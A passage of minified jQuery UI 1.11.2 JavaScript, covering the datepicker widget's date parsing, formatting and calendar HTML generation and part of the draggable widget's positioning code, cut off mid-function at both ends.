i.setDate(i.getDate()+4-(i.getDay()||7)),t=i.getTime(),i.setMonth(0),i.setDate(1),Math.floor(Math.round((t-i)/864e5)/7)+1},parseDate:function(t,i,s){if(null==t||null==i)throw"Invalid arguments";if(i="object"==typeof i?""+i:i+"",""===i)return null;var n,a,o,r,h=0,l=(s?s.shortYearCutoff:null)||this._defaults.shortYearCutoff,u="string"!=typeof l?l:(new Date).getFullYear()%100+parseInt(l,10),d=(s?s.dayNamesShort:null)||this._defaults.dayNamesShort,c=(s?s.dayNames:null)||this._defaults.dayNames,p=(s?s.monthNamesShort:null)||this._defaults.monthNamesShort,f=(s?s.monthNames:null)||this._defaults.monthNames,m=-1,g=-1,v=-1,y=-1,b=!1,_=function(e){var i=t.length>n+1&&t.charAt(n+1)===e;return i&&n++,i},x=function(e){var t=_(e),s="@"===e?14:"!"===e?20:"y"===e&&t?4:"o"===e?3:2,n="y"===e?s:1,a=RegExp("^\\d{"+n+","+s+"}"),o=i.substring(h).match(a);if(!o)throw"Missing number at position "+h;return h+=o[0].length,parseInt(o[0],10)},w=function(t,s,n){var a=-1,o=e.map(_(t)?n:s,function(e,t){return[[t,e]]}).sort(function(e,t){return-(e[1].length-t[1].length)});if(e.each(o,function(e,t){var s=t[1];return i.substr(h,s.length).toLowerCase()===s.toLowerCase()?(a=t[0],h+=s.length,!1):void 0}),-1!==a)return a+1;throw"Unknown name at position "+h},k=function(){if(i.charAt(h)!==t.charAt(n))throw"Unexpected literal at position "+h;h++};for(n=0;t.length>n;n++)if(b)"'"!==t.charAt(n)||_("'")?k():b=!1;else switch(t.charAt(n)){case"d":v=x("d");break;case"D":w("D",d,c);break;case"o":y=x("o");break;case"m":g=x("m");break;case"M":g=w("M",p,f);break;case"y":m=x("y");break;case"@":r=new Date(x("@")),m=r.getFullYear(),g=r.getMonth()+1,v=r.getDate();break;case"!":r=new Date((x("!")-this._ticksTo1970)/1e4),m=r.getFullYear(),g=r.getMonth()+1,v=r.getDate();break;case"'":_("'")?k():b=!0;break;default:k()}if(i.length>h&&(o=i.substr(h),!/^\s+/.test(o)))throw"Extra/unparsed characters found in date: "+o;if(-1===m?m=(new Date).getFullYear():100>m&&(m+=(new Date).getFullYear()-(new Date).getFullYear()%100+(u>=m?0:-100)),y>-1)for(g=1,v=y;;){if(a=this._getDaysInMonth(m,g-1),a>=v)break;g++,v-=a}if(r=this._daylightSavingAdjust(new Date(m,g-1,v)),r.getFullYear()!==m||r.getMonth()+1!==g||r.getDate()!==v)throw"Invalid date";return r},ATOM:"yy-mm-dd",COOKIE:"D, dd M yy",ISO_8601:"yy-mm-dd",RFC_822:"D, d M y",RFC_850:"DD, dd-M-y",RFC_1036:"D, d M y",RFC_1123:"D, d M yy",RFC_2822:"D, d M yy",RSS:"D, d M y",TICKS:"!",TIMESTAMP:"@",W3C:"yy-mm-dd",_ticksTo1970:1e7*60*60*24*(718685+Math.floor(492.5)-Math.floor(19.7)+Math.floor(4.925)),formatDate:function(e,t,i){if(!t)return"";var s,n=(i?i.dayNamesShort:null)||this._defaults.dayNamesShort,a=(i?i.dayNames:null)||this._defaults.dayNames,o=(i?i.monthNamesShort:null)||this._defaults.monthNamesShort,r=(i?i.monthNames:null)||this._defaults.monthNames,h=function(t){var i=e.length>s+1&&e.charAt(s+1)===t;return i&&s++,i},l=function(e,t,i){var s=""+t;if(h(e))for(;i>s.length;)s="0"+s;return s},u=function(e,t,i,s){return h(e)?s[t]:i[t]},d="",c=!1;if(t)for(s=0;e.length>s;s++)if(c)"'"!==e.charAt(s)||h("'")?d+=e.charAt(s):c=!1;else switch(e.charAt(s)){case"d":d+=l("d",t.getDate(),2);break;case"D":d+=u("D",t.getDay(),n,a);break;case"o":d+=l("o",Math.round((new Date(t.getFullYear(),t.getMonth(),t.getDate()).getTime()-new Date(t.getFullYear(),0,0).getTime())/864e5),3);break;case"m":d+=l("m",t.getMonth()+1,2);break;case"M":d+=u("M",t.getMonth(),o,r);break;case"y":d+=h("y")?t.getFullYear():(10>t.getYear()%100?"0":"")+t.getYear()%100;break;case"@":d+=t.getTime();break;case"!":d+=1e4*t.getTime()+this._ticksTo1970;break;case"'":h("'")?d+="'":c=!0;break;default:d+=e.charAt(s)}return d},_possibleChars:function(e){var t,i="",s=!1,n=function(i){var s=e.length>t+1&&e.charAt(t+1)===i;return s&&t++,s};for(t=0;e.length>t;t++)if(s)"'"!==e.charAt(t)||n("'")?i+=e.charAt(t):s=!1;else switch(e.charAt(t)){case"d":case"m":case"y":case"@":i+="0123456789";break;case"D":case"M":return null;case"'":n("'")?i+="'":s=!0;break;default:i+=e.charAt(t)}return i},_get:function(e,t){return void 0!==e.settings[t]?e.settings[t]:this._defaults[t]},_setDateFromField:function(e,t){if(e.input.val()!==e.lastVal){var i=this._get(e,"dateFormat"),s=e.lastVal=e.input?e.input.val():null,n=this._getDefaultDate(e),a=n,o=this._getFormatConfig(e);try{a=this.parseDate(i,s,o)||n}catch(r){s=t?"":s}e.selectedDay=a.getDate(),e.drawMonth=e.selectedMonth=a.getMonth(),e.drawYear=e.selectedYear=a.getFullYear(),e.currentDay=s?a.getDate():0,e.currentMonth=s?a.getMonth():0,e.currentYear=s?a.getFullYear():0,this._adjustInstDate(e)}},_getDefaultDate:function(e){return this._restrictMinMax(e,this._determineDate(e,this._get(e,"defaultDate"),new Date))},_determineDate:function(t,i,s){var n=function(e){var t=new Date;return t.setDate(t.getDate()+e),t},a=function(i){try{return e.datepicker.parseDate(e.datepicker._get(t,"dateFormat"),i,e.datepicker._getFormatConfig(t))}catch(s){}for(var n=(i.toLowerCase().match(/^c/)?e.datepicker._getDate(t):null)||new Date,a=n.getFullYear(),o=n.getMonth(),r=n.getDate(),h=/([+\-]?[0-9]+)\s*(d|D|w|W|m|M|y|Y)?/g,l=h.exec(i);l;){switch(l[2]||"d"){case"d":case"D":r+=parseInt(l[1],10);break;case"w":case"W":r+=7*parseInt(l[1],10);break;case"m":case"M":o+=parseInt(l[1],10),r=Math.min(r,e.datepicker._getDaysInMonth(a,o));break;case"y":case"Y":a+=parseInt(l[1],10),r=Math.min(r,e.datepicker._getDaysInMonth(a,o))}l=h.exec(i)}return new Date(a,o,r)},o=null==i||""===i?s:"string"==typeof i?a(i):"number"==typeof i?isNaN(i)?s:n(i):new Date(i.getTime());return o=o&&"Invalid Date"==""+o?s:o,o&&(o.setHours(0),o.setMinutes(0),o.setSeconds(0),o.setMilliseconds(0)),this._daylightSavingAdjust(o)},_daylightSavingAdjust:function(e){return e?(e.setHours(e.getHours()>12?e.getHours()+2:0),e):null},_setDate:function(e,t,i){var s=!t,n=e.selectedMonth,a=e.selectedYear,o=this._restrictMinMax(e,this._determineDate(e,t,new Date));e.selectedDay=e.currentDay=o.getDate(),e.drawMonth=e.selectedMonth=e.currentMonth=o.getMonth(),e.drawYear=e.selectedYear=e.currentYear=o.getFullYear(),n===e.selectedMonth&&a===e.selectedYear||i||this._notifyChange(e),this._adjustInstDate(e),e.input&&e.input.val(s?"":this._formatDate(e))},_getDate:function(e){var t=!e.currentYear||e.input&&""===e.input.val()?null:this._daylightSavingAdjust(new Date(e.currentYear,e.currentMonth,e.currentDay));return t},_attachHandlers:function(t){var i=this._get(t,"stepMonths"),s="#"+t.id.replace(/\\\\/g,"\\");t.dpDiv.find("[data-handler]").map(function(){var t={prev:function(){e.datepicker._adjustDate(s,-i,"M")},next:function(){e.datepicker._adjustDate(s,+i,"M")},hide:function(){e.datepicker._hideDatepicker()},today:function(){e.datepicker._gotoToday(s)},selectDay:function(){return e.datepicker._selectDay(s,+this.getAttribute("data-month"),+this.getAttribute("data-year"),this),!1},selectMonth:function(){return e.datepicker._selectMonthYear(s,this,"M"),!1},selectYear:function(){return e.datepicker._selectMonthYear(s,this,"Y"),!1}};e(this).bind(this.getAttribute("data-event"),t[this.getAttribute("data-handler")])})},_generateHTML:function(e){var t,i,s,n,a,o,r,h,l,u,d,c,p,f,m,g,v,y,b,_,x,w,k,T,D,S,M,C,N,A,P,I,z,H,F,E,O,j,W,L=new Date,R=this._daylightSavingAdjust(new Date(L.getFullYear(),L.getMonth(),L.getDate())),Y=this._get(e,"isRTL"),B=this._get(e,"showButtonPanel"),J=this._get(e,"hideIfNoPrevNext"),q=this._get(e,"navigationAsDateFormat"),K=this._getNumberOfMonths(e),V=this._get(e,"showCurrentAtPos"),U=this._get(e,"stepMonths"),Q=1!==K[0]||1!==K[1],G=this._daylightSavingAdjust(e.currentDay?new Date(e.currentYear,e.currentMonth,e.currentDay):new Date(9999,9,9)),X=this._getMinMaxDate(e,"min"),$=this._getMinMaxDate(e,"max"),Z=e.drawMonth-V,et=e.drawYear;if(0>Z&&(Z+=12,et--),$)for(t=this._daylightSavingAdjust(new Date($.getFullYear(),$.getMonth()-K[0]*K[1]+1,$.getDate())),t=X&&X>t?X:t;this._daylightSavingAdjust(new Date(et,Z,1))>t;)Z--,0>Z&&(Z=11,et--);for(e.drawMonth=Z,e.drawYear=et,i=this._get(e,"prevText"),i=q?this.formatDate(i,this._daylightSavingAdjust(new Date(et,Z-U,1)),this._getFormatConfig(e)):i,s=this._canAdjustMonth(e,-1,et,Z)?"<a class='ui-datepicker-prev ui-corner-all' data-handler='prev' data-event='click' title='"+i+"'><span class='ui-icon ui-icon-circle-triangle-"+(Y?"e":"w")+"'>"+i+"</span></a>":J?"":"<a class='ui-datepicker-prev ui-corner-all ui-state-disabled' title='"+i+"'><span class='ui-icon ui-icon-circle-triangle-"+(Y?"e":"w")+"'>"+i+"</span></a>",n=this._get(e,"nextText"),n=q?this.formatDate(n,this._daylightSavingAdjust(new Date(et,Z+U,1)),this._getFormatConfig(e)):n,a=this._canAdjustMonth(e,1,et,Z)?"<a class='ui-datepicker-next ui-corner-all' data-handler='next' data-event='click' title='"+n+"'><span class='ui-icon ui-icon-circle-triangle-"+(Y?"w":"e")+"'>"+n+"</span></a>":J?"":"<a class='ui-datepicker-next ui-corner-all ui-state-disabled' title='"+n+"'><span class='ui-icon ui-icon-circle-triangle-"+(Y?"w":"e")+"'>"+n+"</span></a>",o=this._get(e,"currentText"),r=this._get(e,"gotoCurrent")&&e.currentDay?G:R,o=q?this.formatDate(o,r,this._getFormatConfig(e)):o,h=e.inline?"":"<button type='button' class='ui-datepicker-close ui-state-default ui-priority-primary ui-corner-all' data-handler='hide' data-event='click'>"+this._get(e,"closeText")+"</button>",l=B?"<div class='ui-datepicker-buttonpane ui-widget-content'>"+(Y?h:"")+(this._isInRange(e,r)?"<button type='button' class='ui-datepicker-current ui-state-default ui-priority-secondary ui-corner-all' data-handler='today' data-event='click'>"+o+"</button>":"")+(Y?"":h)+"</div>":"",u=parseInt(this._get(e,"firstDay"),10),u=isNaN(u)?0:u,d=this._get(e,"showWeek"),c=this._get(e,"dayNames"),p=this._get(e,"dayNamesMin"),f=this._get(e,"monthNames"),m=this._get(e,"monthNamesShort"),g=this._get(e,"beforeShowDay"),v=this._get(e,"showOtherMonths"),y=this._get(e,"selectOtherMonths"),b=this._getDefaultDate(e),_="",w=0;K[0]>w;w++){for(k="",this.maxRows=4,T=0;K[1]>T;T++){if(D=this._daylightSavingAdjust(new Date(et,Z,e.selectedDay)),S=" ui-corner-all",M="",Q){if(M+="<div class='ui-datepicker-group",K[1]>1)switch(T){case 0:M+=" ui-datepicker-group-first",S=" ui-corner-"+(Y?"right":"left");break;case K[1]-1:M+=" ui-datepicker-group-last",S=" ui-corner-"+(Y?"left":"right");break;default:M+=" ui-datepicker-group-middle",S=""}M+="'>"}for(M+="<div class='ui-datepicker-header ui-widget-header ui-helper-clearfix"+S+"'>"+(/all|left/.test(S)&&0===w?Y?a:s:"")+(/all|right/.test(S)&&0===w?Y?s:a:"")+this._generateMonthYearHeader(e,Z,et,X,$,w>0||T>0,f,m)+"</div><table class='ui-datepicker-calendar'><thead>"+"<tr>",C=d?"<th class='ui-datepicker-week-col'>"+this._get(e,"weekHeader")+"</th>":"",x=0;7>x;x++)N=(x+u)%7,C+="<th scope='col'"+((x+u+6)%7>=5?" class='ui-datepicker-week-end'":"")+">"+"<span title='"+c[N]+"'>"+p[N]+"</span></th>";for(M+=C+"</tr></thead><tbody>",A=this._getDaysInMonth(et,Z),et===e.selectedYear&&Z===e.selectedMonth&&(e.selectedDay=Math.min(e.selectedDay,A)),P=(this._getFirstDayOfMonth(et,Z)-u+7)%7,I=Math.ceil((P+A)/7),z=Q?this.maxRows>I?this.maxRows:I:I,this.maxRows=z,H=this._daylightSavingAdjust(new Date(et,Z,1-P)),F=0;z>F;F++){for(M+="<tr>",E=d?"<td class='ui-datepicker-week-col'>"+this._get(e,"calculateWeek")(H)+"</td>":"",x=0;7>x;x++)O=g?g.apply(e.input?e.input[0]:null,[H]):[!0,""],j=H.getMonth()!==Z,W=j&&!y||!O[0]||X&&X>H||$&&H>$,E+="<td class='"+((x+u+6)%7>=5?" ui-datepicker-week-end":"")+(j?" ui-datepicker-other-month":"")+(H.getTime()===D.getTime()&&Z===e.selectedMonth&&e._keyEvent||b.getTime()===H.getTime()&&b.getTime()===D.getTime()?" "+this._dayOverClass:"")+(W?" "+this._unselectableClass+" ui-state-disabled":"")+(j&&!v?"":" "+O[1]+(H.getTime()===G.getTime()?" "+this._currentClass:"")+(H.getTime()===R.getTime()?" ui-datepicker-today":""))+"'"+(j&&!v||!O[2]?"":" title='"+O[2].replace(/'/g,"&#39;")+"'")+(W?"":" data-handler='selectDay' data-event='click' data-month='"+H.getMonth()+"' data-year='"+H.getFullYear()+"'")+">"+(j&&!v?"&#xa0;":W?"<span class='ui-state-default'>"+H.getDate()+"</span>":"<a class='ui-state-default"+(H.getTime()===R.getTime()?" ui-state-highlight":"")+(H.getTime()===G.getTime()?" ui-state-active":"")+(j?" ui-priority-secondary":"")+"' href='#'>"+H.getDate()+"</a>")+"</td>",H.setDate(H.getDate()+1),H=this._daylightSavingAdjust(H);M+=E+"</tr>"}Z++,Z>11&&(Z=0,et++),M+="</tbody></table>"+(Q?"</div>"+(K[0]>0&&T===K[1]-1?"<div class='ui-datepicker-row-break'></div>":""):""),k+=M}_+=k}return _+=l,e._keyEvent=!1,_},_generateMonthYearHeader:function(e,t,i,s,n,a,o,r){var h,l,u,d,c,p,f,m,g=this._get(e,"changeMonth"),v=this._get(e,"changeYear"),y=this._get(e,"showMonthAfterYear"),b="<div class='ui-datepicker-title'>",_="";if(a||!g)_+="<span class='ui-datepicker-month'>"+o[t]+"</span>";else{for(h=s&&s.getFullYear()===i,l=n&&n.getFullYear()===i,_+="<select class='ui-datepicker-month' data-handler='selectMonth' data-event='change'>",u=0;12>u;u++)(!h||u>=s.getMonth())&&(!l||n.getMonth()>=u)&&(_+="<option value='"+u+"'"+(u===t?" selected='selected'":"")+">"+r[u]+"</option>");_+="</select>"}if(y||(b+=_+(!a&&g&&v?"":"&#xa0;")),!e.yearshtml)if(e.yearshtml="",a||!v)b+="<span class='ui-datepicker-year'>"+i+"</span>";else{for(d=this._get(e,"yearRange").split(":"),c=(new Date).getFullYear(),p=function(e){var t=e.match(/c[+\-].*/)?i+parseInt(e.substring(1),10):e.match(/[+\-].*/)?c+parseInt(e,10):parseInt(e,10);return isNaN(t)?c:t},f=p(d[0]),m=Math.max(f,p(d[1]||"")),f=s?Math.max(f,s.getFullYear()):f,m=n?Math.min(m,n.getFullYear()):m,e.yearshtml+="<select class='ui-datepicker-year' data-handler='selectYear' data-event='change'>";m>=f;f++)e.yearshtml+="<option value='"+f+"'"+(f===i?" selected='selected'":"")+">"+f+"</option>";e.yearshtml+="</select>",b+=e.yearshtml,e.yearshtml=null}return b+=this._get(e,"yearSuffix"),y&&(b+=(!a&&g&&v?"":"&#xa0;")+_),b+="</div>"},_adjustInstDate:function(e,t,i){var s=e.drawYear+("Y"===i?t:0),n=e.drawMonth+("M"===i?t:0),a=Math.min(e.selectedDay,this._getDaysInMonth(s,n))+("D"===i?t:0),o=this._restrictMinMax(e,this._daylightSavingAdjust(new Date(s,n,a)));e.selectedDay=o.getDate(),e.drawMonth=e.selectedMonth=o.getMonth(),e.drawYear=e.selectedYear=o.getFullYear(),("M"===i||"Y"===i)&&this._notifyChange(e)},_restrictMinMax:function(e,t){var i=this._getMinMaxDate(e,"min"),s=this._getMinMaxDate(e,"max"),n=i&&i>t?i:t;return s&&n>s?s:n},_notifyChange:function(e){var t=this._get(e,"onChangeMonthYear");t&&t.apply(e.input?e.input[0]:null,[e.selectedYear,e.selectedMonth+1,e])},_getNumberOfMonths:function(e){var t=this._get(e,"numberOfMonths");return null==t?[1,1]:"number"==typeof t?[1,t]:t},_getMinMaxDate:function(e,t){return this._determineDate(e,this._get(e,t+"Date"),null)},_getDaysInMonth:function(e,t){return 32-this._daylightSavingAdjust(new Date(e,t,32)).getDate()},_getFirstDayOfMonth:function(e,t){return new Date(e,t,1).getDay()},_canAdjustMonth:function(e,t,i,s){var n=this._getNumberOfMonths(e),a=this._daylightSavingAdjust(new Date(i,s+(0>t?t:n[0]*n[1]),1));return 0>t&&a.setDate(this._getDaysInMonth(a.getFullYear(),a.getMonth())),this._isInRange(e,a)},_isInRange:function(e,t){var i,s,n=this._getMinMaxDate(e,"min"),a=this._getMinMaxDate(e,"max"),o=null,r=null,h=this._get(e,"yearRange");return h&&(i=h.split(":"),s=(new Date).getFullYear(),o=parseInt(i[0],10),r=parseInt(i[1],10),i[0].match(/[+\-].*/)&&(o+=s),i[1].match(/[+\-].*/)&&(r+=s)),(!n||t.getTime()>=n.getTime())&&(!a||t.getTime()<=a.getTime())&&(!o||t.getFullYear()>=o)&&(!r||r>=t.getFullYear())},_getFormatConfig:function(e){var t=this._get(e,"shortYearCutoff");return t="string"!=typeof t?t:(new Date).getFullYear()%100+parseInt(t,10),{shortYearCutoff:t,dayNamesShort:this._get(e,"dayNamesShort"),dayNames:this._get(e,"dayNames"),monthNamesShort:this._get(e,"monthNamesShort"),monthNames:this._get(e,"monthNames")}},_formatDate:function(e,t,i,s){t||(e.currentDay=e.selectedDay,e.currentMonth=e.selectedMonth,e.currentYear=e.selectedYear);var n=t?"object"==typeof t?t:this._daylightSavingAdjust(new Date(s,i,t)):this._daylightSavingAdjust(new Date(e.currentYear,e.currentMonth,e.currentDay));return this.formatDate(this._get(e,"dateFormat"),n,this._getFormatConfig(e))}}),e.fn.datepicker=function(t){if(!this.length)return this;e.datepicker.initialized||(e(document).mousedown(e.datepicker._checkExternalClick),e.datepicker.initialized=!0),0===e("#"+e.datepicker._mainDivId).length&&e("body").append(e.datepicker.dpDiv);var i=Array.prototype.slice.call(arguments,1);return"string"!=typeof t||"isDisabled"!==t&&"getDate"!==t&&"widget"!==t?"option"===t&&2===arguments.length&&"string"==typeof arguments[1]?e.datepicker["_"+t+"Datepicker"].apply(e.datepicker,[this[0]].concat(i)):this.each(function(){"string"==typeof t?e.datepicker["_"+t+"Datepicker"].apply(e.datepicker,[this].concat(i)):e.datepicker._attachDatepicker(this,t)}):e.datepicker["_"+t+"Datepicker"].apply(e.datepicker,[this[0]].concat(i))},e.datepicker=new n,e.datepicker.initialized=!1,e.datepicker.uuid=(new Date).getTime(),e.datepicker.version="1.11.2",e.datepicker,e.widget("ui.draggable",e.ui.mouse,{version:"1.11.2",widgetEventPrefix:"drag",options:{addClasses:!0,appendTo:"parent",axis:!1,connectToSortable:!1,containment:!1,cursor:"auto",cursorAt:!1,grid:!1,handle:!1,helper:"original",iframeFix:!1,opacity:!1,refreshPositions:!1,revert:!1,revertDuration:500,scope:"default",scroll:!0,scrollSensitivity:20,scrollSpeed:20,snap:!1,snapMode:"both",snapTolerance:20,stack:!1,zIndex:!1,drag:null,start:null,stop:null},_create:function(){"original"===this.options.helper&&this._setPositionRelative(),this.options.addClasses&&this.element.addClass("ui-draggable"),this.options.disabled&&this.element.addClass("ui-draggable-disabled"),this._setHandleClassName(),this._mouseInit()},_setOption:function(e,t){this._super(e,t),"handle"===e&&(this._removeHandleClassName(),this._setHandleClassName())},_destroy:function(){return(this.helper||this.element).is(".ui-draggable-dragging")?(this.destroyOnClear=!0,void 0):(this.element.removeClass("ui-draggable ui-draggable-dragging ui-draggable-disabled"),this._removeHandleClassName(),this._mouseDestroy(),void 0)},_mouseCapture:function(t){var i=this.options;return this._blurActiveElement(t),this.helper||i.disabled||e(t.target).closest(".ui-resizable-handle").length>0?!1:(this.handle=this._getHandle(t),this.handle?(this._blockFrames(i.iframeFix===!0?"iframe":i.iframeFix),!0):!1)},_blockFrames:function(t){this.iframeBlocks=this.document.find(t).map(function(){var t=e(this);return e("<div>").css("position","absolute").appendTo(t.parent()).outerWidth(t.outerWidth()).outerHeight(t.outerHeight()).offset(t.offset())[0]})},_unblockFrames:function(){this.iframeBlocks&&(this.iframeBlocks.remove(),delete this.iframeBlocks)},_blurActiveElement:function(t){var i=this.document[0];if(this.handleElement.is(t.target))try{i.activeElement&&"body"!==i.activeElement.nodeName.toLowerCase()&&e(i.activeElement).blur()}catch(s){}},_mouseStart:function(t){var i=this.options;return this.helper=this._createHelper(t),this.helper.addClass("ui-draggable-dragging"),this._cacheHelperProportions(),e.ui.ddmanager&&(e.ui.ddmanager.current=this),this._cacheMargins(),this.cssPosition=this.helper.css("position"),this.scrollParent=this.helper.scrollParent(!0),this.offsetParent=this.helper.offsetParent(),this.hasFixedAncestor=this.helper.parents().filter(function(){return"fixed"===e(this).css("position")}).length>0,this.positionAbs=this.element.offset(),this._refreshOffsets(t),this.originalPosition=this.position=this._generatePosition(t,!1),this.originalPageX=t.pageX,this.originalPageY=t.pageY,i.cursorAt&&this._adjustOffsetFromHelper(i.cursorAt),this._setContainment(),this._trigger("start",t)===!1?(this._clear(),!1):(this._cacheHelperProportions(),e.ui.ddmanager&&!i.dropBehaviour&&e.ui.ddmanager.prepareOffsets(this,t),this._normalizeRightBottom(),this._mouseDrag(t,!0),e.ui.ddmanager&&e.ui.ddmanager.dragStart(this,t),!0)},_refreshOffsets:function(e){this.offset={top:this.positionAbs.top-this.margins.top,left:this.positionAbs.left-this.margins.left,scroll:!1,parent:this._getParentOffset(),relative:this._getRelativeOffset()},this.offset.click={left:e.pageX-this.offset.left,top:e.pageY-this.offset.top}},_mouseDrag:function(t,i){if(this.hasFixedAncestor&&(this.offset.parent=this._getParentOffset()),this.position=this._generatePosition(t,!0),this.positionAbs=this._convertPositionTo("absolute"),!i){var s=this._uiHash();if(this._trigger("drag",t,s)===!1)return this._mouseUp({}),!1;this.position=s.position}return this.helper[0].style.left=this.position.left+"px",this.helper[0].style.top=this.position.top+"px",e.ui.ddmanager&&e.ui.ddmanager.drag(this,t),!1},_mouseStop:function(t){var i=this,s=!1;return e.ui.ddmanager&&!this.options.dropBehaviour&&(s=e.ui.ddmanager.drop(this,t)),this.dropped&&(s=this.dropped,this.dropped=!1),"invalid"===this.options.revert&&!s||"valid"===this.options.revert&&s||this.options.revert===!0||e.isFunction(this.options.revert)&&this.options.revert.call(this.element,s)?e(this.helper).animate(this.originalPosition,parseInt(this.options.revertDuration,10),function(){i._trigger("stop",t)!==!1&&i._clear()}):this._trigger("stop",t)!==!1&&this._clear(),!1},_mouseUp:function(t){return this._unblockFrames(),e.ui.ddmanager&&e.ui.ddmanager.dragStop(this,t),this.handleElement.is(t.target)&&this.element.focus(),e.ui.mouse.prototype._mouseUp.call(this,t)},cancel:function(){return this.helper.is(".ui-draggable-dragging")?this._mouseUp({}):this._clear(),this},_getHandle:function(t){return this.options.handle?!!e(t.target).closest(this.element.find(this.options.handle)).length:!0},_setHandleClassName:function(){this.handleElement=this.options.handle?this.element.find(this.options.handle):this.element,this.handleElement.addClass("ui-draggable-handle")},_removeHandleClassName:function(){this.handleElement.removeClass("ui-draggable-handle")},_createHelper:function(t){var i=this.options,s=e.isFunction(i.helper),n=s?e(i.helper.apply(this.element[0],[t])):"clone"===i.helper?this.element.clone().removeAttr("id"):this.element;return n.parents("body").length||n.appendTo("parent"===i.appendTo?this.element[0].parentNode:i.appendTo),s&&n[0]===this.element[0]&&this._setPositionRelative(),n[0]===this.element[0]||/(fixed|absolute)/.test(n.css("position"))||n.css("position","absolute"),n},_setPositionRelative:function(){/^(?:r|a|f)/.test(this.element.css("position"))||(this.element[0].style.position="relative")},_adjustOffsetFromHelper:function(t){"string"==typeof t&&(t=t.split(" ")),e.isArray(t)&&(t={left:+t[0],top:+t[1]||0}),"left"in t&&(this.offset.click.left=t.left+this.margins.left),"right"in t&&(this.offset.click.left=this.helperProportions.width-t.right+this.margins.left),"top"in t&&(this.offset.click.top=t.top+this.margins.top),"bottom"in t&&(this.offset.click.top=this.helperProportions.height-t.bottom+this.margins.top)},_isRootNode:function(e){return/(html|body)/i.test(e.tagName)||e===this.document[0]},_getParentOffset:function(){var t=this.offsetParent.offset(),i=this.document[0];return"absolute"===this.cssPosition&&this.scrollParent[0]!==i&&e.contains(this.scrollParent[0],this.offsetParent[0])&&(t.left+=this.scrollParent.scrollLeft(),t.top+=this.scrollParent.scrollTop()),this._isRootNode(this.offsetParent[0])&&(t={top:0,left:0}),{top:t.top+(parseInt(this.offsetParent.css("borderTopWidth"),10)||0),left:t.left+(parseInt(this.offsetParent.css("borderLeftWidth"),10)||0)}},_getRelativeOffset:function(){if("relative"!==this.cssPosition)return{top:0,left:0};var e=this.element.position(),t=this._isRootNode(this.scrollParent[0]);return{top:e.top-(parseInt(this.helper.css("top"),10)||0)+(t?0:this.scrollParent.scrollTop()),left:e.left-(parseInt(this.helper.css("left"),10)||0)+(t?0:this.scrollParent.scrollLeft())}},_cacheMargins:function(){this.margins={left:parseInt(this.element.css("marginLeft"),10)||0,top:parseInt(this.element.css("marginTop"),10)||0,right:parseInt(this.element.css("marginRight"),10)||0,bottom:parseInt(this.element.css("marginBottom"),10)||0}},_cacheHelperProportions:function(){this.helperProportions={width:this.helper.outerWidth(),height:this.helper.outerHeight()}},_setContainment:function(){var t,i,s,n=this.options,a=this.document[0];return this.relativeContainer=null,n.containment?"window"===n.containment?(this.containment=[e(window).scrollLeft()-this.offset.relative.left-this.offset.parent.left,e(window).scrollTop()-this.offset.relative.top-this.offset.parent.top,e(window).scrollLeft()+e(window).width()-this.helperProportions.width-this.margins.left,e(window).scrollTop()+(e(window).height()||a.body.parentNode.scrollHeight)-this.helperProportions.height-this.margins.top],void 0):"document"===n.containment?(this.containment=[0,0,e(a).width()-this.helperProportions.width-this.margins.left,(e(a).height()||a.body.parentNode.scrollHeight)-this.helperProportions.height-this.margins.top],void 0):n.containment.constructor===Array?(this.containment=n.containment,void 0):("parent"===n.containment&&(n.containment=this.helper[0].parentNode),i=e(n.containment),s=i[0],s&&(t=/(scroll|auto)/.test(i.css("overflow")),this.containment=[(parseInt(i.css("borderLeftWidth"),10)||0)+(parseInt(i.css("paddingLeft"),10)||0),(parseInt(i.css("borderTopWidth"),10)||0)+(parseInt(i.css("paddingTop"),10)||0),(t?Math.max(s.scrollWidth,s.offsetWidth):s.offsetWidth)-(parseInt(i.css("borderRightWidth"),10)||0)-(parseInt(i.css("paddingRight"),10)||0)-this.helperProportions.width-this.margins.left-this.margins.right,(t?Math.max(s.scrollHeight,s.offsetHeight):s.offsetHeight)-(parseInt(i.css("borderBottomWidth"),10)||0)-(parseInt(i.css("paddingBottom"),10)||0)-this.helperProportions.height-this.margins.top-this.margins.bottom],this.relativeContainer=i),void 0):(this.containment=null,void 0)
},_convertPositionTo:function(e,t){t||(t=this.position);var i="absolute"===e?1:-1,s=this._isRootNode(this.scrollParent[0]);return{top:t.top+this.offset.relative.top*i+this.offset.parent.top*i-("fixed"===this.cssPosition?-this.offset.scroll.top:s?0:this.offset.scroll.top)*i,left:t.left+this.offset.relative.left*i+this.offset.parent.left*i-("fixed"===this.cssPosition?-this.offset.scroll.left:s?0:this.offset.scroll.left)*i}},_generatePosition:function(e,t){var i,s,n,a,o=this.options,r=this._isRootNode(this.scrollParent[0]),h=e.pageX,l=e.pageY;return r&&this.offset.scroll||(this.offset.scroll={top:this.scrollParent.scrollTop(),left:this.scrollParent.scrollLeft()}),t&&(this.containment&&(this.relativeContainer?(s=this.relativeContainer.offset(),i=[this.containment[0]+s.left,this.containment[1]+s.top,this.containment[2]+s.left,this.containment[3]+s.top]):i=this.containment,e.pageX-this.offset.click.left<i[0]&&(h=i[0]+this.offset.click.left),e.pageY-this.offset.click.top<i[1]&&(l=i[1]+this.offset.click.top),e.pageX-this.offset.click.left>i[2]&&(h=i[2]+this.offset.click.left),e.pageY-this.offset.click.top>i[3]&&(l=i[3]+this.offset.click.top)),o.grid&&(n=o.grid[1]?this.originalPageY+Math.round((l-this.originalPageY)/o.grid[1])*o.grid[1]:this.originalPageY,l=i?n-this.offset.click.top>=i[1]||n-this.offset.click.top>i[3]?n:n-this.offset.click.top>=i[1]?n-o.grid[1]:n+o.grid[1]:n,a=o.grid[0]?this.originalPageX+Math.round((h-this.originalPageX)/o.grid[0])*o.grid[0]:this.originalPageX,h=i?a-this.offset.click.left>=i[0]||a-this.offset.click.left>i[2]?a:a-this.offset.click.left>=i[0]?a-o.grid[0]:a+o.grid[0]:a),"y"===o.axis&&(h=this.originalPageX),"x"===o.axis&&(l=this.originalPageY)),{top:l-this.offset.click.top-this.offset.relative.top-this.offset.parent.top+("fixed"===this.cssPosition?-this.offset.scroll.top:r?0:this.offset.scroll.top),left:h-this.offset.click.left-this.offset.relative.left-this.offset.parent.left+("fixed"===this.cssPosition?-this.offset.scroll.left:r?0:this.offset.scroll.left)}},_clear:function(){this.helper.removeClass("ui-draggable-dragging"),this.helper[0]===this.element[0]||this.cancelHelperRemoval||this.helper.remove(),this.helper=null,this.cancelHelperRemoval=!1,this.destroyOnClear&&this.destroy()},_normalizeRightBottom:function(){"y"!==this.options.axis&&"auto"!==this.helper.css("right")&&(this.helper.width(